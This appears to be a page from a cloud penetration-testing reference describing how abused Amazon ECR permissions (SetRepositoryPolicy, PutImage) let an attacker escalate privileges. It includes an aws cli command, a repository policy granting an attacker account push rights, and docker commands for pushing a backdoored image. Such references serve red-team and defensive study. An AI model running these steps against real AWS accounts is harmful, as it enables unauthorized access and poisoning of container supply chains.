Elastic Container Registry (ECR)

Abusable Amazon ECR permissions that can lead to compromise or privilege escalation

ecr:SetRepositoryPolicy

With access to these permissions, an attacker can create/modify a repository's resource permission policy, escalting their privileges.

aws --region us-east-1 ecr set-repository-policy --repository-name tyler/my-private-repo --policy-text file://repo_policy.json

For the repository policy, the attacker could specify all AWS principals (any in the world):

"Principal": "*",
Or could specify the ARN of the their (attacker) account's root user (which actually allows anyone in the attacker's account these permissions):

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowEveryone",
      "Effect": "Allow",
      "Principal": {
        "AWS": [
          "arn:aws:iam::<attacker-aws-account-id>:root"
        ]
      },
      "Action": [
        "ecr:PutImage",
        "ecr:DescribeImages",
        "ecr:ListImages",
        "ecr:DescribeRepositories",
        "ecr:GetAuthorizationToken"
      ]
    }
  ]
}

ecr:PutImage

With access to this permission, an attacker could upload a compromised image e.g., one with a backdoor or that sends data back to a C&C server (command and control).

docker tag attacker-compromised-ubuntu:latest 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest

docker push 111111111111.dkr.ecr.us-east-1.amazonaws.com/tyler/my-private-registry:ubuntu-latest

PreviousAWS Privilege Escalation NextIdentity Access Management (IAM)

Last updated 18 days ago

Was this helpful?